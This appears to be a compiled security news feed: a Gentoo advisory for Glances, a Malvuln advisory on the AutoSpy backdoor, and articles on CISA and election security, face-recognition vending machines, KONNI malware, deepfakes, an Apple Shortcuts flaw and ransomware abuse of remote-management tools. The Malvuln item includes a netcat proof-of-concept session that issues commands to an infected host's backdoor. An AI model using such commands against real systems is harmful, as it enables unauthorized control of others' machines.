Gentoo Linux Security Advisory 202402-30 - A vulnerability has been found in Glances which may lead to arbitrary code execution. Versions greater than or equal to 3.1.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Glances: Arbitrary Code Execution  
     Date: February 26, 2024  
     Bugs: #791565  
       ID: 202402-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Glances which may lead to arbitrary  
code execution.

Background  
==========

Glances is an open-source system cross-platform monitoring tool. It  
allows real-time monitoring of various aspects of your system such as  
CPU, memory, disk, network usage etc.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
sys-process/glances  < 3.1.7       >= 3.1.7

Description  
===========

A vulnerability in XML parsing may lead to a variety of XML attacks.

Impact  
======

A vulnerability in XML parsing may lead to a variety of XML attacks.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Glances users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-process/glances-3.1.7"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-30

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Republicans who run elections are split over whether to keep working with the Cybersecurity and Infrastructure Security Agency to fight hackers, online falsehoods, and polling-place threats.

The meeting between top US election officials and their cybersecurity partners from the federal government almost went off without a hitch. Then Mac Warner spoke up.

Warner, West Virginia’s Republican secretary of state, didn’t have a mundane logistical question for the government representatives, who were speaking at the winter meeting of the National Association of Secretaries of State in Washington, DC, on February 8. Instead, Warner lambasted the officials for what he said was their agencies’ scheme to suppress the truth about US president Joe Biden’s son Hunter during the 2020 election and then cover their tracks.

“When we have our own federal agencies lying to the American people, that’s the most insidious thing that we can do in elections,” Warner told the officials from the FBI and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), who watched him impassively from the stage. “You all need to clean up your own houses.”

Neither of the officials responded to Warner, and the NASS meeting—a semiannual confab for the nation’s election administrators that deals with everything from mail-in voting to cyber threats—quickly moved on to other business. But Warner, who attended an election-denier rally after Biden’s 2020 victory and is now running for governor on a far-right platform, isn’t a fringe voice in the GOP. His impassioned speech reflected a growing right-wing backlash to the election security work of agencies like CISA and the FBI—one that now threatens the partnership that the federal government has been painstakingly building with state leaders over the eight years since Russia interfered in the 2016 election.

CISA plays a critical role in helping states run secure elections, but its work alerting social media companies to misinformation has earned it special contempt from conservatives. While most GOP secretaries of state are holding their fire about CISA’s efforts to combat online lies, Democrats and nonpartisan experts worry that that could change in the coming years. With national Republicans increasingly turning against CISA—investigating its activities and voting to slash its budget—the agency’s partnerships with GOP leaders in the states are more vulnerable than ever before.

“The hard and necessary work of securing our elections should not be a partisan issue,” says US representative Chris Deluzio, a Pennsylvania Democrat and former cyber policy scholar. “So I am very concerned that some Republican secretaries of state might undermine that work just to serve their selfish partisan interests.”

Stumbling Into Controversy

The federal program that earned Warner’s wrath began as a response to the rampant mis- and disinformation that has spread online since the 2016 election.

Determined to avoid another contest marred by viral false claims about voting processes, CISA in 2018 began coordinating conversations with social media companies and other federal agencies about the best ways to counter dangerous and destabilizing lies. During the 2020 election, through a process known as “switchboarding,” CISA alerted social media firms to complaints from state and local election officials about online misinformation, such as posts advertising incorrect voting times and locations.

It was in this spirit that FBI officials met with Twitter and Facebook executives in the lead-up to Election Day 2020 and advised them to be wary of Russian disinformation operations involving fake documents. That warning later led both companies to suppress posts about a controversial _New York Post_ story about the contents of a laptop belonging to Hunter Biden.

Silicon Valley’s response to the Hunter Biden laptop story outraged conservatives, who began accusing tech companies and their federal partners of conspiring to censor speech in an effort to rig the election. In subsequent investigations, CISA found itself squarely in the crosshairs. The agency had already earned the ire of former president Donald Trump and his allies for reassuring the public about the integrity of the 2020 election, but the new controversy practically made it a pariah on the right.

In June 2023, a House Judiciary Committee report blasted CISA as “the nerve center of the federal government’s domestic surveillance and censorship operations on social media.” A few months later, a federal appeals court partially affirmed a district judge’s ruling that placed limits on CISA’s ability to communicate with tech companies, finding that the agency’s work to fight disinformation “likely violated the First Amendment.”

Stunned by the intense backlash, CISA stopped working with social media platforms to combat mis- and disinformation. The FBI, too, scaled back its interactions with those companies, halting briefings about foreign interference activities. “The symbiotic relationship between the government and the social media companies has definitely been fractured,” a US official told NBC News.

CISA has staunchly avoided acknowledging the reality that its reputation has been damaged.

“CISA’s election security mission is stronger than ever,” says Cait Conley, a senior adviser to director Jen Easterly who oversees the agency’s election work. “We remain engaged with election officials in all 50 states and will continue to conduct all of our work in an apolitical and nonpartisan manner.”

A GOP Split

As the controversies have eroded CISA’s bipartisan brand, Republicans who run elections have split into two camps over whether to keep working with the agency to fight hackers, online falsehoods, and polling-place threats.

West Virginia’s Warner is the indisputable flag-bearer of the anti-CISA camp. “I’ve pulled away from them,” he tells WIRED at the NASS conference, a few hours after venting his frustrations to the federal officials. “I’m not attending their briefings, because I haven’t found anything useful out of them.”

Warner says he’s proud of the “tremendous advances” that federal and state officials have made together on election security since 2016, but he warns that CISA and the FBI will continue losing conservatives’ trust until they investigate their roles in the controversies of 2020. “I’ve brought this to the attention of CISA officials,” he says, “and there’s no effort there to do this.”

Warner argues that CISA’s warnings about foreign disinformation, AI-powered deep fakes, and death threats to election officials are “distractions from the real threat to American democracy” posed by censorship.

It remains unclear how many of Warner’s colleagues agree with him. But when WIRED surveyed the other 23 Republican secretaries who oversee elections in their states, several of them said they would continue working with CISA.

“The agency has been beneficial to our office by providing information and resources as it pertains to cybersecurity,” says JoDonn Chaney, a spokesperson for Missouri’s Jay Ashcroft.

South Dakota’s Monae Johnson says her office “has a good relationship with its CISA partners and plans to maintain the partnership.”

But others who praised CISA’s support also sounded notes of caution.

Idaho’s Phil McGrane says CISA is doing “critical work … to protect us from foreign cyber threats.” But he also tells WIRED that the Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC), a public-private collaboration group that he helps oversee, “is actively reviewing past efforts regarding mis/disinformation” to determine “what aligns best” with CISA’s mission.

Mississippi’s Michael Watson says that “statements following the 2020 election and some internal confidence issues we’ve since had to navigate have caused concern.” As federal and state officials gear up for this year’s elections, he adds, “my hope is CISA will act as a nonpartisan organization and stick to the facts.”

CISA’s relationships with Republican secretaries are “not as strong as they’ve been before,” says John Merrill, who served as Alabama’s secretary of state from 2015 to 2023. In part, Merrill says, that’s because of pressure from the GOP base. “Too many conservative Republican secretaries are not just concerned about how the interaction with those federal agencies is going, but also about how it’s perceived … by their constituents.”

Free Help at Risk

CISA’s defenders say the agency does critical work to help underfunded state and local officials confront cyber and physical threats to election systems.

The agency’s career civil servants and political leaders “have been outstanding” during both the Trump and Biden administrations, says Minnesota secretary of state Steve Simon, a Democrat.

Others specifically praised CISA’s coordination with tech companies to fight misinformation, arguing that officials only highlighted false claims and never ordered companies to delete posts.

“They’re just making folks aware of threats,” says Arizona’s Democratic secretary of state, Adrian Fontes. The real “bad actors,” he says, are the people who “want the election denialists and the rumor-mongers to run amok and just spread out whatever lies they want.”

If Republican officials begin disengaging from CISA, their states will lose critical security protections and resources. CISA sponsors the EI-ISAC, which shares information about threats and best practices for thwarting them; provides free services like scanning election offices’ networks for vulnerabilities, monitoring those networks for intrusions and reviewing local governments’ contingency plans; and convenes exercises to test election officials’ responses to crises.

“For GOP election officials to back away from \[CISA\] would be like a medical patient refusing to accept free wellness assessments, check-ups, and optional prescriptions from one of the world’s greatest medical centers,” says Eddie Perez, a former director for civic integrity at Twitter and a board member at the OSET Institute, a nonprofit group advocating for improved election technology.

Worse, some CISA projects will become less effective as they lose participants. The EI-ISAC’s information-sharing initiative is only as valuable as the information that state and federal agencies submit to it.

Even if most states stick with CISA, it would only take a few holdouts to create systemic risk. “America's election security posture is only as strong as its weakest jurisdiction,” says David Levine, the senior elections integrity fellow at the German Marshall Fund’s Alliance for Securing Democracy.

Cautious Optimism Despite ‘Strain’

Election security experts and Democratic officials express cautious optimism that there won’t be a GOP exodus from CISA this year.

“I have faith Republican secretaries of state will continue to prioritize their voters and collaborate with CISA to ensure a secure 2024 election,” says Mississippi representative Bennie Thompson, the top Democrat on the House Homeland Security Committee.

Lawrence Norden, the senior director of the Brennan Center for Justice’s Elections and Government Program, notes that some of CISA’s new regional election security advisers “have worked in recent years as or for Republican officeholders,” giving them credibility with GOP leaders.

According to Minnesota’s Simon, “the vast majority of secretaries find these partnerships valuable.”

Still, Warner says some secretaries quietly support his pushback against CISA and other aspects of the Biden administration’s election security strategy. “There \[is a\] meeting of the minds by some of the secretaries, especially on the right, with some of these similar concerns,” he says, even if “they’re not as outspoken as I am.”

That shared skepticism of CISA means that, even after Warner leaves office next year, the agency will remain on precarious footing with some of its Republican partners. For now, CISA’s allies are left hoping that the agency’s time-tested bonds will prove stronger than pressures from conservative activists.

“You can have strain in some areas of a relationship and still have a strong relationship,” says Arizona’s Fontes. “That’s what being a grown-up is about. And I think most of us are doing that pretty well.”

How a Right-Wing Controversy Could Sabotage US Election Security

By cyberwire
Brea, California, February 26th, 2024, Cyberwire – The current large surge in cyber threats has left many organizations…
This is a post from HackRead.com Read the original post: ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware & Nation-State Cyber Threats

**Brea, California, February 26th, 2024, Cyberwire** – The current large surge in cyber threats has left many organizations grappling for security so ThreatHunter.ai is taking decisive action. Recognizing the critical juncture at which the digital world stands, ThreatHunter.ai is now offering its cutting-edge cybersecurity services free of charge to all organizations for 30 days, irrespective of their current cybersecurity measures. 

James McMurry, Founder of ThreatHunter.ai, reflects on the situation’s urgency: “In the past 48 hours alone, we have stopped hundreds of actual attacks and performed mitigations for our customers. Yet, the frequency and sophistication of these attacks are escalating at an alarming rate. Our mission is clear: to extend our protective reach to every organization in need, ensuring that the digital frontier is safe for all.”

Drawing on recent events and the resilient nature of cyber threats, as highlighted in an insightful piece on the LockBit ransomware saga, it’s evident that the cybersecurity landscape is more volatile than ever. The LockBit group’s audacity in bouncing back after a significant takedown operation underlines the persistent and evolving threat posed by cybercriminals. 

ThreatHunter.ai, with its elite team of threat hunters, engineers, and cybersecurity experts, employs the ARGOS platform to provide real-time threat detection and mitigation. Our AI and ML-driven technologies have been pivotal in safeguarding organizations from the ever-evolving tactics of cyber adversaries.

“We see the problem getting larger, with cyber threats becoming more sophisticated by the day. Offering our services for free for 30 days is our way of bolstering the defences of organizations across the globe. It’s a call to action for everyone, and to show that ThreatHunter.ai is much more than all the MDRs offering automated alerts, we actually will stop threats, and how our team operates as part of our customers’ cyber team,” McMurry emphasizes.

This initiative is not just about offering a temporary solution; it’s about raising awareness and driving home the point that in the face of rising cyber threats, complacency is not an option.

Organizations interested in taking advantage of ThreatHunter.ai’s complimentary 30-day services are encouraged to reach out immediately. Together, we can turn the tide against the cyber threats that loom large over our connected world.

****About ThreatHunter.ai****

ThreatHunter.ai is at the forefront of cybersecurity, specializing in real-time detection, analysis, and mitigation of cyber threats. Powered by the innovative ARGOS platform, our approach combines advanced AI and ML technologies with the expertise of the industry’s most skilled professionals. We are dedicated to defending the digital infrastructure against the complex landscape of cyber threats, ensuring peace of mind for businesses and governments worldwide.

ThreatHunter.ai, a 100% Service-Disabled Veteran Owned Small Business, is a leading provider of AI-driven threat-hunting solutions. Its advanced machine learning algorithms and expert analysis help organizations detect, identify, and respond to cyber threats. Its solutions are designed to supplement existing security resources and provide a fresh perspective on how to address today’s complex cyber threats.

Don’t miss the opportunity to safeguard your organization with the unparalleled cybersecurity protection offered by ThreatHunter.ai. Visit our website at www.threathunter.ai to explore our unique approach, learn more about our cutting-edge solutions, and discover how we can empower your business to stay ahead of cyber threats.

To speak with our experts or schedule a personalized demo, reach out to our sales team at \[email protected\] or call 714.515.4011. Take action today and ensure the security and resilience of your digital infrastructure.

****Contact****

*   **Lydia Coulter**
*   **Marketing and Media Manager**
*   **ThreatHunter.ai**
*   **7145154011**
*   **\[email protected\]**

ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware & Nation-State Cyber Threats

A student investigation at the University of Waterloo uncovered a system that scanned countless undergrads without consent.

Canada-based University of Waterloo is racing to remove M&M-branded smart vending machines from campus after outraged students discovered the machines were covertly collecting face recognition data without their consent.

The scandal started when a student using the alias SquidKid47 posted an image on Reddit showing a campus vending machine error message, “Invenda.Vending.FacialRecognitionApp.exe,” displayed after the machine failed to launch a face recognition application that nobody expected to be part of the process of using a vending machine.

"Hey, so why do the stupid M&M machines have facial recognition?" SquidKid47 pondered.

The Reddit post sparked an investigation from a fourth-year student named River Stanley, who was writing for a university publication called MathNEWS.

Stanley sounded the alarm after consulting Invenda sales brochures that promised “the machines are capable of sending estimated ages and genders” of every person who used the machines—without ever requesting consent.

This frustrated Stanley, who discovered that Canada's privacy commissioner had years ago investigated a shopping mall operator called Cadillac Fairview after discovering some of the malls' informational kiosks were secretly “using facial recognition software on unsuspecting patrons.”

Only because of that official investigation did Canadians learn that “over 5 million nonconsenting Canadians” were scanned into Cadillac Fairview's database, Stanley reported. Where Cadillac Fairview was ultimately forced to delete the entire database, Stanley wrote that consequences for collecting similarly sensitive face recognition data without consent for Invenda clients like Mars remain unclear.

Stanley's report ended with a call for students to demand that the university “bar facial recognition vending machines from campus.”

A University of Waterloo spokesperson, Rebecca Elming, eventually responded, confirming to CTV News that the school had asked to disable the vending machine software until the machines could be removed.

Students told CTV News that their confidence in the university's administration was shaken by the controversy. Some students claimed on Reddit that they attempted to cover the vending machine cameras while waiting for the school to respond, using gum or Post-it notes. One student pondered whether “there are other places this technology could be being used” on campus.

Elming was not able to confirm the exact timeline for when the machines would be removed, other than telling Ars it would happen “as soon as possible.” Elming declined Ars' request to clarify if there are other areas of campus collecting face recognition data. She also wouldn't confirm, for any casual snackers on campus, when, if ever, students could expect the vending machines to be replaced with snack dispensers not equipped with surveillance cameras.

Invenda Claims Machines Are GDPR-Compliant

MathNEWS' investigation tracked down responses from companies responsible for smart vending machines on the University of Waterloo's campus.

Adaria Vending Services told MathNEWS that “what’s most important to understand is that the machines do not take or store any photos or images, and an individual person cannot be identified using the technology in the machines. The technology acts as a motion sensor that detects faces, so the machine knows when to activate the purchasing interface—never taking or storing images of customers.”

According to Adaria and Invenda, students shouldn't worry about data privacy because the vending machines are “fully compliant” with the world's toughest data privacy law, the European Union's General Data Protection Regulation (GDPR).

“These machines are fully GDPR compliant and are in use in many facilities across North America,” Adaria's statement said. “At the University of Waterloo, Adaria manages last mile fulfillment services—we handle restocking and logistics for the snack vending machines. Adaria does not collect any data about its users and does not have any access to identify users of these M&M vending machines.”

A Vending Machine Error Revealed Secret Face Recognition Tech

By Waqas
Friend or Foe?
This is a post from HackRead.com Read the original post: Russian Ministry Software Backdoored with North Korean KONNI Malware

Discover the latest cybersecurity revelation: KONNI malware, linked to North Korean cyber operations, targets the Russian Ministry of Foreign Affairs. Learn about the sophisticated tactics and geopolitical implications

German cybersecurity firm DCSO has discovered a malware sample uploaded to VirusTotal in January 2024, believed to be part of North Korea-linked activity targeting the Russian Ministry of Foreign Affairs (MID). The malware is believed to be **KONNI**, a North Korean nexus tool used since 2014.

KONNI, first **discovered in 2014**, is associated with the Democratic People’s Republic of Korea (DPRK)-nexus actors like Konni Group and TA406. The malware has unique stealer functionality and remote administration capability. It’s installed in an MSI file, with C2 servers encrypted with AES-CTR, and a CustomAction for detection and payload selection.

In the latest discovery, researchers noted that KONNI’s command set remains unchanged, allowing operators to execute commands, upload/download files, specify sleep intervals, communicate via HTTP, and compress file extensions into .CAB archives.

> #ShortAndMalicious  
> Our researchers recently discovered an installer for the mandatory 🇷🇺Russian tax filling software "Spravki BK" (Справки БК) which was backdoored with #KONNI malware, generally attributed to 🇰🇵North Korean threat actors. 1/5
> 
> — DCSO CyTec (@DCSO\_CyTec) October 17, 2023

Interestingly, the sample **DCSO analyzed** was delivered via a backdoored Russian language software installer, similar to a previously observed KONNI delivery technique. The sample was for a tool called “Statistika KZU”, which is believed to be intended for internal use within the Russian MID. The software is used for relaying annual report files from overseas consular posts to the MID’s Consular Department via a secure channel.

Additionally, two user manuals were found in the backdoored installer, detailing the installation and usage of the “Statistika KZU” program. The first manual explains installing the program on an administrative account, providing minimum software requirements and screenshots.

The second 22-pager manual, “StatRKZU\_Pyкoвoдcтвo,” outlines how to use the software for generating annual report files on KZU consular activities, including templates for calculating registered and detained citizens.

The MID’s software, identified as “GosNIIAS” (a Russian federal research institute primarily involved in aerospace research), was tested offline and found legitimate. Despite no direct correlations between GosNIIAS and Statistika KZU, references to contracts were found, including a procurement order for automated system maintenance and data protection software.

This discovery comes amid increasing geopolitical proximity between Russia and the DPRK, following Russia’s renewed invasion of Ukraine in 2022.

****Russia and North Korea’s Cyber Standoff****

This is not the first time Russia and North Korea have made collective headlines over cybersecurity threats. **In August 2023**, the world witnessed another significant incident when “elite North Korean hackers” affiliated with OpenCarrot and the Lazarus group breached NPO Mashinostroyeniya, a key Russian missile developer. This breach, lasting for at least five months, revealed the alarming capabilities and determination of the attackers.

****Previous Use of KONNI Backdoor****

KONNI has been used in many cyberespionage campaigns targeting Russian agencies. FortiGuard Labs discovered a KONNI malware campaign **in November 2023**, targeting Windows systems through Word documents with malicious macros. Malwarebytes researchers **discovered** a campaign in mid-2021 using Russian language lures concerning Russian-Korean trade and economic issues and a meeting of a Russian-Mongolian intergovernmental commission.

An unknown hacking group **targeted** North Korean organizations using KONNI Malware in 2017. Three campaigns were identified back then- two by Talos Intelligence, a Cisco-owned cybersecurity firm, and the third reported by Cylance security firm.

For insights into this, we reached out to John Bambenek, President at Bambenek Consulting, who emphasised that “It is not uncommon for intelligence agencies to spy even on their putative allies, if for nothing else, for insights to either strengthen the relationship or to identify and mitigate threats.”

Mr. Bambenek highlighted that “The use of a backdoor in software used almost exclusively by the Russian Foreign Ministry stands out and shows that the DPRK did their research here for a particular hook into their victims and is, ironically, a more targeted and precise adaptation of the approach Russian intelligence used with **NotPetya**.”

“Espionage has a couple of nuances where sometimes you want more sophisticated tools and for some attacks, you want narrow and simpler tools. For espionage, you want long-term persistent infection and sophisticated and interactive tools provide defenders more opportunities for detection. It’s not uncommon to see tools used for espionage that lack some of the obfuscation commonly observed in **cybercrime tools**,” he added.

****RELATED ARTICLES****

1.  **Gone: Russian Central Bank hacked; $31 million stolen**
2.  **2 Russian Industrial Firms Hacked, 112GB of Data Leaked**
3.  **Anonymous Leaks 128 GB of Data from Russian ISP Convex**
4.  **Elite North Korean Hackers Breach Russian Missile Developer**
5.  **Anonymous Hacks Central Bank of Russia; Leaks 28GB of Data**

Russian Ministry Software Backdoored with North Korean KONNI Malware

By Deeba Ahmed
In 2024, over 60 countries worldwide are holding elections. The most significant threat to the integrity of these elections? Deepfake videos, readily accessible on the dark web and Telegram, with prices ranging from as low as $2 to $100.
This is a post from HackRead.com Read the original post: Deepfake Threat: $2 Deceptive Content Undermines Election Integrity

Deepfake technology poses a significant threat to the upcoming US elections as it is not just a technological challenge but a manifestation of a broader deception mechanism, explained Check Point Research (CPR).

In its latest report, cybersecurity researchers at Check Point Research team highlighted the dangers posed by the widespread availability of artificial intelligence-based technologies, particularly deepfake, in encouraging electoral fraud.

Researchers cited deepfake technology as a significant threat to the authenticity of the electoral process due to features like voice cloning that can manipulate voters and sabotage the entire process. The technology is cheap, accessible to anyone with an internet connection, and untraceable, which hinders election security given the ongoing challenges in legislating against these technologies.

**Deepfake** technology allows users to create “fabricated audiovisual content,” which poses a threat to public opinion and democratic institutions, researchers noted. With over 3,000 repositories on GitHub and hundreds of channels on Telegram (at least 400-500), deepfake services range from automated bots to personalized services. Pricing varies from $2 per video to $100 for multiple attempts, making it affordable to commission deceptive content.

Recent incidents of damage caused by deepfake technology highlight its growing threat. **In February 2024**, an Asian company fell victim to scammers who impersonated the company’s CFO during an online meeting, resulting in a loss of over $25 million.

On platforms like YouTube, deepfake technology is being exploited by scammers to perpetrate crypto scams. Verified channels have been targeted **to steal millions of dollars worth of crypto**, with deepfakes of prominent figures such as Elon Musk, Bill Gates, Ripple’s CEO Brad Garlinghouse, Michael J. Saylor, and others being used to deceive unsuspecting viewers.

**In June 2023**, deepfake technology was utilized to disseminate fabricated video messages from President Putin. Similarly, **in 2022**, a deepfake video of Ukrainian President Zelensky went viral, urging Ukrainians to surrender.

Despite efforts to combat deepfakes, such as the launch of **McAfee’s tool MockingBird**, which boasts a 90% accuracy rate in detecting malicious content, the potential damage from deepfake technology remains considerable and, in many cases, irreversible.

“The potential for election fraud through the adept use of artificial intelligence and deepfake technologies, orchestrated by a clandestine network operating from the shadows, leaving no digital fingerprints” Check Point Research Team wrote in the **blog post** published on 22 February 2024.

Researchers noted that an underground network of actors can manipulate public perception and undermine democratic integrity through deepfakes. The anonymity of this technology makes it difficult to hold anyone accountable. **Traditional cybersecurity measures** are insufficient as the threat lies in the entire ecosystem of deception it enables, including bots, fake accounts, and anonymized services.

**Voice cloning**, a subset of deepfake technology that uses machine learning and artificial intelligence to replicate a person’s voice with remarkable accuracy, is particularly effective in spreading misinformation. It allows the creation of convincing fake audio clips and is particularly effective in spreading misinformation, as incidents involving robocalls with fabricated messages from political leaders have already been observed.

For instance, a robocall featuring fake US President **Joe Biden voice warning** New Hampshire voters not to cast their ballots would cost from $10 to several hundred dollars depending on the level of accuracy and technological efficacy required.

To protect democratic processes from deepfakes, a multifaceted approach involving legislative measures, public awareness, technological solutions, and international cooperation is needed, including enhanced digital literacy and collaboration between technology companies and law enforcement, researchers concluded.

1.  **Website uses AI to create utterly realistic human faces**
2.  **Fake Voicemails Target Users, 1000 Attacks in 14 Days**
3.  **Scammers Weaponize Google Forms in New BazarCall Attack**
4.  **Scammers Made Deepfake AI Hologram of Binance Executive**
5.  **Building Defense Toolbox: Tools, Tactics to Combat Cyber Threats**

Deepfake Threat: $2 Deceptive Content Undermines Election Integrity

Details have emerged about a now-patched high-severity security flaw in Apple's Shortcuts app that could permit a shortcut to access sensitive information on the device without users' consent.
The vulnerability, tracked as CVE-2024-23204 (CVSS score: 7.5), was addressed by Apple on January 22, 2024, with the release of iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3, and

Researchers Detail Apple's Recent Zero-Click Shortcuts Vulnerability

By Waqas
Another day, another Apple Security Vulnerability!
This is a post from HackRead.com Read the original post: Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!

Apple Shortcuts security vulnerability (CVE-2024-23204) allows attackers to access targeted devices and steal sensitive data – update your devices now!

Cybersecurity firm Bitdefender has discovered a 7.5/10 severity rating vulnerability in Apple Shortcuts, allowing attackers to access sensitive data without prompting users. According to Bitdefender’s blog post published on 22 February 2024, this vulnerability tracked as **CVE-2024-23204**, allows attackers to create a Shortcuts file bypassing Apple’s security framework for macOS and iOS.

Apple Shortcuts is a popular **macOS and iOS** automation app that simplifies tasks by allowing users to create personalized workflows using visual programming to automate tasks like app control, media management, messaging, location-based actions, and more. Users can create workflows for file management, health tracking, web automation, education, and smart home integration, thereby improving productivity and user experience.

The vulnerability was found in the shortcut sharing/expanding mechanism in Apple’s Shortcuts community. The community allows users to discover and expedite automation workflows and export/share shortcuts.

CVE-2024-23204 on the other hand, lets users unknowingly import shortcuts that could exploit the Transparency, Consent, and Control (TCC) security framework in macOS and iOS. This framework helps ensure user privacy and security by requiring explicit permission before accessing sensitive data or functionalities.

During the attack, as noted by researchers in their **blog post**, the ‘Expand URL’ function in Shortcuts lets attackers transmit base64-encoded photo data to a malicious website. This involves selecting sensitive data, importing it, converting it using the base64 encode option, and forwarding it to the server. A Flask program captures the transmitted data, allowing the attacker to store it for exploitation. The issue is fixed in **macOS Sonoma 14.3**, **watchOS 10.3**, **iOS 17.3, and iPadOS 17.3**. 

Still, it highlights the need for continuous security vigilance in Apple’s Shortcuts application, given its potential for privacy breaches. Users are advised to use the latest software. Users are advised to update macOS, iPadOS, and watchOS devices, remain cautious when executing shortcuts from untrusted sources, and regularly check for **Apple security updates and patches**.

****Watch the vulnerability in action!****

The rising number of flaws identified in Apple apps and devices recently has effectively busted the myth of Apple products being the most reliable in safeguarding user data. Last year Apple patched a record number of vulnerabilities.

In July 2023, Apple issued a critical **security alert** for iPhone, iPad, and Mac users, urging them to update their devices soon due to a software vulnerability in its Safari WebKit browser engine.

In October 2023, researchers from Georgia Tech, the University of Michigan, and Ruhr University Bochum **discovered an iLeakage** vulnerability in Apple devices, affecting Macs and iPhones since 2020. The attack exploited a side-channel vulnerability in CPUs, allowing Safari to divulge sensitive data, including passwords and Gmail content.

In December 2023, a **Bluetooth vulnerability**, CVE-2023-45866, let attackers control Android, Linux, macOS, and iOS devices without user confirmation to install malicious apps, run commands, and perform unauthorized actions.

The same month, Apple **released** security updates to address two zero-day vulnerabilities, CVE-2023-42916 and CVE-2023-42917, which allowed hackers to execute code and access sensitive data on compromised devices through malicious web pages.

1.  **Apple Approves Fake App Before Real Rabby Wallet**
2.  **Apple Safari Safest, Google Chrome Riskiest Browser**
3.  **Apple AirTags can be used as trojan for credential hacking**
4.  **55 Apple vulnerabilities risked iCloud account takeover, data theft**
5.  **Apple Bug bounty: Earn big backs for hacking iPhone, other products**

Apple Shortcuts Vulnerability Exposes Sensitive Data, Update Now!

More and more ransomware gangs are using RMM tools in their attacks.

One of the most alarming trends our ThreatDown Intelligence team has noticed lately is the increased exploitation of legitimate Remote Monitoring and Management (RMM) tools by ransomware gangs in their attacks.

RMM software, such as AnyDesk, Atera, and Splashtop, are essential for IT administrators to remotely access and manage devices within their networks. Unfortunately, ransomware gangs can also exploit these tools to penetrate company networks and exfiltrate data, effectively allowing them to “live off the land”.

In this post, we will delve into how ransomware gangs use RMM tools, identify the most exploited RMM tools, and discuss how to detect and prevent suspicious RMM tool activity using Application Block and Endpoint Detection and Response (EDR).

**How ransomware gangs utilize RMM tools**

Ransomware gangs exploit Remote Monitoring and Management (RMM) tools through one of three main strategies:

1.  **Gaining initial access via preexisting RMM tools**: As RMM tools typically require credentials for system access, attackers can exploit weak or default RMM credentials and vulnerabilities to gain unauthorized access to a network.
2.  **Installing RMM tools post-infection**: Once inside a network, ransomware attackers can install their own RMM tools to maintain access and control, setting the stage for a ransomware attack. For example, the ThreatDown Intelligence team noted a case where ransomware attackers exploited an unpatched VMWare Horizon server to install Atera.
3.  **Hybrid approach**: Attackers can use a slew of different social engineering scams, such as technical support scams or malvertising, to trick employees into installing RMM tools onto their own machines, enabling both initial access and a mechanism for ransomware deployment. The Barclays banking scam we wrote about in February 2024 is an example of this approach.

**Top RMM tools exploited by ransomware gangs**

The following RMM tools are commonly used by both ransomware gangs to oversee and control IT infrastructure remotely.

*   **Splashtop**: A remote access and support solution tailored for businesses, MSPs, and educational institutions. Exploited by the ransomware gangs CACTUS, BianLian, ALPHV, Lockbit.
*   **Atera**: An integrated RMM tool for MSPs that offers remote access, monitoring, and management. Exploited by Royal, BianLian, ALPHV.
*   **TeamViewer**: A software for remote access and support. Exploited by BianLian.
*   **ConnectWise**: A suite that includes solutions for remote support, management, and monitoring. Exploited by Medusa.
*   **LogMeIn**: Provides secure remote access to computers from any location for IT management and support. Exploited by Royal.
*   **SuperOps**: An MSP platform that combines RMM, PSA, and other IT management features. Exploited by CACTUS.

Nearly all of the ten ransomware gangs have included one of the above RMM tools in their attacks.

